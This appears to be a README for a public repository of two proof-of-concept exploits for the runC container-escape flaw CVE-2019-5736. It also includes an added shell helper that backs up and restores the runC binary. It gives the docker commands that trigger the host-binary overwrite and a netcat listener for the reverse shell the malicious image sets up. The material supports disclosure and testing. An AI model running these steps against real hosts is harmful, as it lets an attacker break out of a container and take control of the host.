RunC-CVE-2019-5736
Two POCs for CVE-2019-5736.
See Twistlock Labs for an explanation of CVE-2019-5736 and the POCs.
The malicious image POC is heavily based on q3k’s POC, so all credit goes to him.
Running the POCs
Note that running the POCs will overwrite the runC binary on the host, even though the POC code itself runs inside a container. Until the binary is restored, Docker can no longer start or exec into containers, so run the POCs on a disposable VM.
It is highly recommended that you create a copy of your runC binary before running one of the POCs. It is normally located at /usr/sbin/runc, but the path differs between distributions and Docker versions (for example /usr/bin/runc or docker-runc), so verify where it lives on your host first.
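The following helper is an added example and is not part of this repository: it copies the host's runC binary and records its SHA-256 before a POC run, then tells you whether a POC replaced the binary and puts the original back. The default path /usr/sbin/runc and the backup directory /root/runc-backup are assumptions; override RUNC_PATH and BACKUP_DIR if runC lives elsewhere on your host.

```sh
#!/bin/sh
# Added example, not part of the twistlock/RunC-CVE-2019-5736 repository.
# Snapshot the host's runC binary before running a POC, detect whether the
# POC overwrote it, and put the original back afterwards.
#
# Usage (as root on the host):
#   sh runc_guard.sh snapshot    # before running a POC
#   sh runc_guard.sh check       # after the POC: exit 1 if runc was replaced
#   sh runc_guard.sh restore     # copy the original back into place
#
# RUNC_PATH and BACKUP_DIR are assumed defaults; override them in the
# environment if runc lives elsewhere (e.g. /usr/bin/runc or docker-runc).

RUNC_PATH="${RUNC_PATH:-/usr/sbin/runc}"
BACKUP_DIR="${BACKUP_DIR:-/root/runc-backup}"

# SHA-256 of a file, using whichever tool the host has.
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# snapshot_runc <runc-path> <backup-dir>: copy the binary (preserving mode and
# timestamps) and record its hash so a later overwrite can be proven.
snapshot_runc() {
    mkdir -p "$2"
    cp -p "$1" "$2/runc.orig"
    file_sha256 "$1" > "$2/runc.sha256"
}

# runc_intact <runc-path> <backup-dir>: return 0 if the binary still matches
# the recorded hash, 1 if it has been replaced (or no snapshot exists).
runc_intact() {
    [ -f "$2/runc.sha256" ] || return 1
    [ "$(file_sha256 "$1")" = "$(cat "$2/runc.sha256")" ]
}

# restore_runc <runc-path> <backup-dir>: overwrite the (now malicious) file
# with the saved original; cp -p keeps the executable bit.
restore_runc() {
    [ -f "$2/runc.orig" ] || return 1
    cp -p "$2/runc.orig" "$1"
}

# Dispatch only when invoked with a subcommand so the functions can also be
# sourced; running with no arguments does nothing.
case "${1:-}" in
    snapshot) snapshot_runc "$RUNC_PATH" "$BACKUP_DIR" ;;
    check)
        if runc_intact "$RUNC_PATH" "$BACKUP_DIR"; then
            echo "runc unchanged: $RUNC_PATH"
        else
            echo "runc was REPLACED: $RUNC_PATH (run 'restore')" >&2
            exit 1
        fi ;;
    restore) restore_runc "$RUNC_PATH" "$BACKUP_DIR" && echo "restored $RUNC_PATH" ;;
esac
```

Run the snapshot step once before the first POC and the check step after each POC; a failed check is the expected outcome on a vulnerable host, and restore must be run before Docker can start containers again.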
Clone the repository:
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736
Exec POC
Overwrites runC on the host with a simple program that prints a string. The overwrite is triggered by the docker exec step below, not by starting the container, so the container must still be running when you exec into it.
Running the exec POC:
$ docker build -t image_name:latest /path/to/exec_POC
$ docker run -d --rm --name container_name image_name:latest
$ docker exec container_name bash
Malicious Image POC
Overwrites runC on the host with a simple bash reverse-shell script that connects back to localhost:2345, so start the listener on the host before running the image.
Listen for the reverse shell:
$ nc -nvlp 2345
From a different shell, run the malicious image POC:
$ docker build -t image_name:latest /path/to/malicious_image_POC
$ docker run --rm image_name:latest